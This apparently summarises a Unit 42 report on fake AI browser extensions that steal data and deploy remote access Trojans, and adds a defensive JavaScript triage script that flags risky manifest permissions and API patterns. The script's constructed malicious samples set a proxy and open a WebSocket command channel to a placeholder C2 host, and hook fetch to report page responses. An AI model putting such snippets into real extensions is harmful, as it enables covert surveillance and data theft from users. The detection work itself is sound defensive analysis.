unit42.paloaltonetworks.com · 4/30/2026, 10:32:30 PM

Fake AI Browser Extensions Steal Data and Deploy RATs

Unit 42’s analysis identifies 18 AI browser extensions, marketed as productivity tools, that are not what they seem: some surveil email, others intercept prompts or exfiltrate passwords. The report shows these high‑risk extensions deliver remote access Trojans and infostealers or mount man‑in‑the‑middle attacks, using a range of GenAI lures together with techniques such as API interception, passive DOM observation, traffic proxying and HTTPS decryption.

Table 1 summarises recurring techniques seen across the extensions: WebSocket-based C2 channels, browser API hooking, DOM exfiltration, dynamic proxy configuration, cross-storage persistence and misuse of onInstalled events. Case studies cover six malware categories, ranging from a RAT extension that holds open a persistent WebSocket connection, to a Supersonic AI extension whose content scripts read email content in plaintext, to a Chat AI for Chrome extension that hijacks users’ search settings.
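The techniques listed above map onto things a reviewer can check statically in an extension package before installing it: the permissions and host patterns in manifest.json, and a handful of API patterns in the bundled scripts (proxy configuration, webRequest listeners, WebSocket connections opened to remote hosts, content scripts scoped to webmail, search-provider overrides, onInstalled handlers that immediately reach out to the network, and reassignment of fetch or XMLHttpRequest). The script below is an added example written for this summary, not Unit 42’s tooling or anything from the report; the two manifests, the script text, the indicator list and its weights are all constructed for illustration, and the .test domains are placeholders.

```javascript
// Added example (not Unit 42's tooling): static triage of a Chrome extension package
// for the technique indicators listed above. Manifests, script text, indicator weights
// and verdict thresholds are constructed for illustration.

// Host patterns: MV2 lists them under "permissions", MV3 under "host_permissions".
function hostPatterns(m) {
  return [...(m.permissions || []), ...(m.host_permissions || [])]
    .filter((p) => p === "<all_urls>" || p.includes("://"));
}

// Match patterns of every declared content script.
function contentMatches(m) {
  return (m.content_scripts || []).flatMap((cs) => cs.matches || []);
}

// "<all_urls>", "*://*/*" and "https://*/*" all grant access to every origin.
function isBroadHost(p) {
  return p === "<all_urls>" || /^(\*|https?):\/\/\*\/\*?$/.test(p);
}

// Each indicator pairs a permission or API pattern with a weight. A genuine
// "AI productivity" extension rarely needs any of them; several together are the
// pattern the report describes. The regexes are heuristics: a WebSocket URL held
// in a variable, or an obfuscated bundle, will not match and needs manual review.
const INDICATORS = [
  { id: "broad-hosts", weight: 3,
    test: (m) => hostPatterns(m).some(isBroadHost) },
  { id: "proxy-control", weight: 3,
    test: (m, src) => (m.permissions || []).includes("proxy") ||
      /chrome\.proxy\.settings\.set\(/.test(src) },
  { id: "request-interception", weight: 2,
    test: (m, src) => (m.permissions || []).includes("webRequest") ||
      /chrome\.webRequest\.on\w+\.addListener\(/.test(src) },
  { id: "websocket-c2", weight: 2,
    test: (_m, src) => /new WebSocket\(\s*["'`]wss?:\/\//.test(src) },
  { id: "mail-content-script", weight: 2,
    test: (m) => contentMatches(m).some((p) => /mail\.google\.com|outlook\.(live|office)\.com/.test(p)) },
  { id: "search-hijack", weight: 2,
    test: (m) => Boolean(m.chrome_settings_overrides && m.chrome_settings_overrides.search_provider) },
  { id: "install-hook-network", weight: 1,
    test: (_m, src) => /onInstalled\.addListener\([\s\S]{0,600}?(fetch\(|new WebSocket\(|proxy\.settings\.set\()/.test(src) },
  { id: "api-hooking", weight: 2,
    test: (_m, src) => /(window\.fetch|XMLHttpRequest\.prototype\.(open|send))\s*=\s*/.test(src) },
];

// Run every indicator over the manifest and the concatenated script sources.
function triage(manifest, sources) {
  const src = sources.join("\n");
  const hit = INDICATORS.filter((i) => i.test(manifest, src));
  const score = hit.reduce((s, i) => s + i.weight, 0);
  const verdict = score >= 6 ? "high" : score >= 3 ? "medium" : "low";
  return { hits: hit.map((i) => i.id), score, verdict };
}

// Least-privilege check: permissions and host patterns declared beyond the set the
// extension's advertised feature actually needs (the "needed" list is the reviewer's input).
function excessPermissions(manifest, needed) {
  return [...(manifest.permissions || []), ...(manifest.host_permissions || [])]
    .filter((p) => !needed.includes(p));
}

// Constructed sample: an "AI writing helper" that exhibits every indicator above.
const SUSPECT_MANIFEST = {
  manifest_version: 3,
  name: "Smart AI Writing Helper",
  permissions: ["storage", "proxy", "webRequest", "tabs"],
  host_permissions: ["<all_urls>"],
  background: { service_worker: "bg.js" },
  content_scripts: [{ matches: ["https://mail.google.com/*"], js: ["reader.js"] }],
  chrome_settings_overrides: {
    search_provider: { search_url: "https://search.example.test/?q={searchTerms}", is_default: true },
  },
};
const SUSPECT_BG = `
chrome.runtime.onInstalled.addListener(() => {
  chrome.proxy.settings.set({ value: { mode: "pac_script", pacScript: { url: "https://c2.example.test/p.pac" } } });
  const ws = new WebSocket("wss://c2.example.test/ch");
  ws.onmessage = (e) => handleCommand(e.data);
});
`;
const SUSPECT_READER = `
const origFetch = window.fetch;
window.fetch = async (...a) => { const r = await origFetch(...a); report(await r.clone().text()); return r; };
`;

// Constructed sample: a narrowly scoped note-taking extension with no indicators.
const BENIGN_MANIFEST = {
  manifest_version: 3,
  name: "Prompt Notes",
  permissions: ["storage", "activeTab"],
  content_scripts: [{ matches: ["https://assistant.example.test/*"], js: ["notes.js"] }],
};
const BENIGN_SCRIPT = `
chrome.runtime.onInstalled.addListener(() => chrome.storage.local.set({ installed: Date.now() }));
document.addEventListener("keydown", saveDraft);
`;

console.log(JSON.stringify(triage(SUSPECT_MANIFEST, [SUSPECT_BG, SUSPECT_READER])));
console.log(JSON.stringify(triage(BENIGN_MANIFEST, [BENIGN_SCRIPT])));
console.log(JSON.stringify(excessPermissions(SUSPECT_MANIFEST, ["storage", "activeTab"])));
```

To use this against a real package, unzip the .crx, load manifest.json with JSON.parse and pass the text of every file named in background, content_scripts and web_accessible_resources as the sources array. The score is only a prioritisation aid: a "medium" verdict means read the code, and a "low" one does not clear an extension whose bundle is minified or loads code at runtime.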

Unit 42 notes that Google has removed the 18 extensions or warned their owners, and urges users to install extensions only from trusted providers and to apply least-privilege principles. Palo Alto Networks says its customers are protected through products including Prisma Browser and Prisma AIRS, and the report lists contact details for the Unit 42 Incident Response team. The cited publication date is 30 April 2026.

Article by CyberSIXT